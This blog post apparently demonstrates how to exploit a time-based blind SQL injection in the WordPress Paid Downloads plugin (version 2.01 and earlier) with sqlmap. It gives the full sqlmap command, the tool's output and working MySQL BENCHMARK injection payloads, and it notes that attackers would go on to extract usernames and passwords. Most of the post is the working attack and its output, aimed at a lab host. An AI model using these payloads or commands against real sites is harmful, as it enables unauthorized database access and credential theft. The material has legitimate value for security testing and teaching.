For all of you who wondered how to exploit time-based SQLi vulnerabilities here you'll find a short presentation using sqlmap. This is also dedicated to all people around that think that time-based injection(s) is something of no significant practical value.
If you've followed vulnerabilities posted lately on this blog you've probably seen some of the PoCs (engl. abbr. Proof of Concept) containing payloads like
"-1 AND 1=IF(2>1, BENCHMARK(5000000, MD5(CHAR(115,113,108,109,97,112))),0)--%20". Those cases are the perfect candidates for some good old time-based exploitation.
We'll take "WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability" as a candidate for this little presentation:
$ python sqlmap.py -u "http://172.16.180.133/wp-content/plugins/paid-downloads/d ownload.php?download_key=1" --dbms=mysql --level=3 --risk=3 --technique=T --bann er sqlmap/1.0-dev (r4374) - automatic SQL injection and database takeover tool http://www.sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsib le for any misuse or damage caused by this program [*] starting at 18:54:25 [18:54:25] [INFO] using '/home/stamparm/Work/sqlmap/output/172.16.180.133/sessio n' as session file [18:54:25] [INFO] testing connection to the target url [18:54:27] [INFO] heuristics detected web page charset 'ascii' [18:54:27] [INFO] testing if the url is stable, wait a few seconds [18:54:29] [INFO] url is stable [18:54:29] [INFO] testing if GET parameter 'download_key' is dynamic [18:54:31] [WARNING] GET parameter 'download_key' appears to be not dynamic [18:54:33] [WARNING] heuristic test shows that GET parameter 'download_key' migh t not be injectable [18:54:33] [INFO] testing sql injection on GET parameter 'download_key' [18:54:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [18:54:33] [WARNING] time-based comparison needs larger statistical model. Makin g a few dummy requests, please wait.. [18:54:34] [CRITICAL] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-ag ent, sqlmap is going to retry the request [18:54:38] [CRITICAL] there is considerable lagging (standard deviation: 0.9 sec ) in connection response(s). Please use as high value for --time-sec option as p ossible (e.g. 10 or more) [18:54:43] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)' [18:55:05] [INFO] GET parameter 'download_key' is 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable [18:55:05] [INFO] checking if the injection point on GET parameter 'download_key ' is a false positive GET parameter 'download_key' is vulnerable. Do you want to keep testing the othe rs? [y/N] N sqlmap identified the following injection points with a total of 40 HTTP(s) requ ests: --- Place: GET Parameter: download_key Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: download_key=1' AND 6424=BENCHMARK(5000000,MD5(CHAR(102,100,78,99)) ) AND 'uzOQ'='uzOQ --- [18:55:36] [INFO] testing MySQL [18:55:36] [WARNING] it is very important not to stress the network adapter's ba ndwidth during usage of time-based queries [18:55:46] [INFO] confirming MySQL [18:56:05] [INFO] the back-end DBMS is MySQL [18:56:05] [INFO] fetching banner [18:56:05] [INFO] retrieved: 5.1.41-3ubuntu12.8 web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) web application technology: PHP 5.3.2, Apache 2.2.14 back-end DBMS operating system: Linux Ubuntu back-end DBMS: MySQL >= 5.0.0 banner: '5.1.41-3ubuntu12.8' [19:07:44] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s qlmap/output/172.16.180.133' [*] shutting down at 19:07:44
p.s. Notice that the retrieval of banner took around 10 minutes (attackers will in these kind of cases take just the most sensitive information, like usernames and passwords). Same way you can retrieve other data by using switches like:
$ python -c "print ''.join([chr(x) for x in [115,113,108,109,97,112]])" sqlmap:)